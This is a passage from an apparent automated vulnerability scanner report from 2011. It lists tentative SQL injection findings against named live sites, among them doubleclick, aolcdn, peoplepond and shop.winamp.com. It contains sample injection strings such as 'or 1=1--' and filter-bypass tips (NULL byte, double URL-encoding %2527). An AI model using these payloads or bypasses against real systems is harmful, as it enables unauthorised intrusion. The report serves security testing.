GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
Response 1
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:53:54 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 10985 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div> ...[SNIP]... |
Request 2
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
Response 2
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:53:55 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 11041 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... |
1.11. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://googleads.g |
Path: | /pagead/ads |
Issue detail
The u_w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
Response 1
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:59:52 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 10976 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div> ...[SNIP]... |
Request 2
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
Response 2
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:59:53 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 14565 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... |
1.12. http://o.aolcdn.com/os_merge/ [file parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://o.aolcdn.com |
Path: | /os_merge/ |
Issue detail
The file parameter appears to be vulnerable to SQL injection attacks. The payloads 80562684'%20or%201%3d1--Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.winamp.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 1
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1835 Cache-Control: public, max-age=30 Expires: Sun, 27 Feb 2011 17:46:13 GMT Date: Sun, 27 Feb 2011 17:45:43 GMT Connection: close Vary: Accept-Encoding <html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!- : file=/aol/jquery.getjs-1 : file=/aol/jquery.getjs-1 : file=/aol/jquery.getjs-1 ...[SNIP]... |
Request 2
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.winamp.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 2
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT Content-Type: text/plain Cache-Control: public, max-age=2592000 Expires: Tue, 29 Mar 2011 17:45:43 GMT Date: Sun, 27 Feb 2011 17:45:43 GMT Connection: close Vary: Accept-Encoding Content-Length: 15821 (function(d,c){d // jquery.openwindow-1.0.min (function(i,o){var q=0;i.openWindow=function l(f,k);b.push("width="+f) function(h){return this.each(function(){var a=this,b=a.href;b&&i(a) /* jQuery Omniture Tracking Plugin Eaily attach click tracking to any link. Dependencies: - Omniture H Code (s_265 object) - jQuery 1.4.2 Usage: $("#my-link").omniTrack({ suite: "aolshare", // Suite the click ...[SNIP]... |
1.13. http://peoplepond.com/_mint/ [MintUnique cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://peoplepond.com |
Path: | /_mint/ |
Issue detail
The MintUnique cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the MintUnique cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: symfony=b452c47d2256 |
Response 1
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:04 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5171 Connection: close Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/ path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent if (navigator.plug ...[SNIP]... |
Request 2
GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: symfony=b452c47d2256 |
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:08 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5161 Connection: close Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/ path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent if (navigator.plugins && nav ...[SNIP]... |
1.14. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The BIGipServerp-drh-dc1pod5The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.15. http://shop.winamp.com/store [JSESSIONID cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.16. http://shop.winamp.com/store [Locale parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The Locale parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Locale parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23783 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.17. http://shop.winamp.com/store [Referer HTTP header] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 Referer: http://www.google.com |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:54 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 32916 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: REQ_000002 at com.digitalriver.catalog at com.digitalriver.rules at ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 Referer: http://www.google.com |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:55 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.18. http://shop.winamp.com/store [ThemeID parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The ThemeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ThemeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:45:50 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23801 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... /store?Action=Displa ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.19. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 41391 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... :include src="/store?1'=1&Action ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000002 at com.digitalriver.system at com.digitalriver.system ...[SNIP]... .tomcat.util.threads at java.lang.Thread.run Caused by: com.digitalriver.rules Failed expression:product at com.digitalriver.rules at com.digitalriver.rules ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.20. http://shop.winamp.com/store [productID parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The productID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the productID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 25208 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>java.lang.NullP at com.digitalriver.security at sun.reflect.Generate at sun.reflect.Delegati ...[SNIP]... |
Request 2
